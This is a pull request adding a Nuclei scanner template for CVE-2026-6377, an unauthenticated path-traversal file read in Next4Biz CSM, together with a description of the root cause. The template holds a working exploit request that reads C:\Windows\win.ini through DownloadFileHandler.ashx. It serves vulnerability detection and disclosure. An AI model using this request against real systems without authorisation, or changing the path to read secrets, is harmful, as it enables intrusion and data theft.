### PR TITLE
Add CVE-2026-6377 - Next4Biz CSM - Arbitrary File Read via DownloadFileHandler

### DIFF
--- a/http/cves/2026/CVE-2026-6377.yaml
+++ b/http/cves/2026/CVE-2026-6377.yaml
@@ -1,0 +1,52 @@
+id: CVE-2026-6377
+
+info:
+  name: Next4Biz CSM - Arbitrary File Read via DownloadFileHandler
+  author: 1dayexploit
+  severity: high
+  description: |
+    Next4Biz CSM exposes the DownloadFileHandler.ashx endpoint, whose file parameter is passed to a path helper that never confirms the resolved path stays inside the upload directory before the file is streamed back. Because Path.Combine returns an absolute second argument verbatim, an unauthenticated attacker can supply an absolute Windows path and read any file the IIS application pool identity can open.
+  impact: |
+    Unauthenticated attackers can read arbitrary files from the server, including application configuration and secrets, which can lead to further compromise.
+  remediation: |
+    Update to the vendor-provided fixed release.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-6377
+    - https://www.cve.org/CVERecord?id=CVE-2026-6377
+    - https://github.com/1dayexploit/advisories/tree/main/advisories/cve-2026-6377-next4biz-csm-path-traversal
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cve-id: CVE-2026-6377
+    cwe-id: CWE-22
+  metadata:
+    verified: false
+    max-request: 1
+    vendor: next4biz
+    product: csm
+  tags: cve,cve2026,next4biz,fileread,traversal,unauth
+
+http:
+  - raw:
+      - |
+        GET /Handlers/DownloadFileHandler.ashx?file=C:\Windows\win.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - "[fonts]"
+          - "[extensions]"
+          - "[mci extensions]"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "filename=win.ini"


### PR DESCRIPTION
### Template

`http/cves/2026/CVE-2026-6377.yaml` - Next4Biz CSM - Arbitrary File Read via DownloadFileHandler

### Summary

CVE-2026-6377 is an unauthenticated path traversal / arbitrary file read in Next4Biz CSM. The `/Handlers/DownloadFileHandler.ashx` endpoint passes its `file` parameter to a path helper that never confirms the resolved path stays inside the upload directory, then streams the file with `Response.WriteFile()`. Because .NET's `Path.Combine` returns an absolute second argument verbatim, supplying an absolute Windows path reads any file the IIS application pool identity can open, with no session or cookie.

- **CVE:** CVE-2026-6377
- **CVSS:** 8.6 High (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N`)
- **CWE:** CWE-22
- **Severity:** high

### Detection

Single unauthenticated GET requesting `C:\Windows\win.ini`, a file present on every Windows host and containing nothing sensitive. The template fires only when all three signals line up: HTTP 200, the Windows win.ini section markers (`[fonts]`, `[extensions]`, `[mci extensions]`) in the body, and a `Content-Disposition` header echoing `filename=win.ini`, the exact name supplied in the request. A patched build that constrains the path never streams this file, so the AND matcher does not fire. The probe reads nothing of value and writes, executes and changes nothing on the target.

### Notes on verification

`metadata.verified` is set to `false`. Next4Biz CSM is a proprietary product with no public or containerised build, so the template could not be re-run against a live vulnerable/patched pair. The detection keys on the exact response captured in the coordinated-disclosure report for this CVE. Syntax validated with `nuclei -validate`.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2026-6377
- https://www.cve.org/CVERecord?id=CVE-2026-6377
- https://github.com/1dayexploit/advisories/tree/main/advisories/cve-2026-6377-next4biz-csm-path-traversal
